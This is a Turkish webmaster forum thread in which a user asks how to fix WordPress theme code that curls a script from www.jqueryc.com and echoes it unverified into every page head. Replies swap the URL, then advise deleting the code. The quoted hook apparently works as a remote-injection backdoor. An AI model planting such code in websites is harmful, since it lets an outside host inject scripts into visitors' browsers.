• 26-11-2012, 18:55:58
    #1
    Merhaba temanın functions.php dosyasında aşağıdaki kodlar bulunuyor ama bu kodu çektiği site www.jqueryc.com kapalı ben bu kodu başka türlü nerden çekebilirim yardımcı olursanız sevinirim


    if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url="http://www.jqueryc.com/jquery-1.6.3.min.js";$ch = curl_init();$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');}
  • 27-11-2012, 09:11:39
    #2
    yardım ede bilecek kimse yokmu arkadaşlar
  • 27-11-2012, 09:24:55
    #3
    Kimlik doğrulama veya yönetimden onay bekliyor.
    if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url="http://ajax.googleapis.com/ajax/libs/jquery/1.6.3/jquery.min.js";$ch = curl_init();$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');}
  • 27-11-2012, 10:49:51
    #4
    malesef çalışmadı hocam
  • 27-11-2012, 17:39:05
    #5
    o kodu komple sil
    tema da header.php de
    <head> den sonra bi yere ekleyiver
    <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"></script>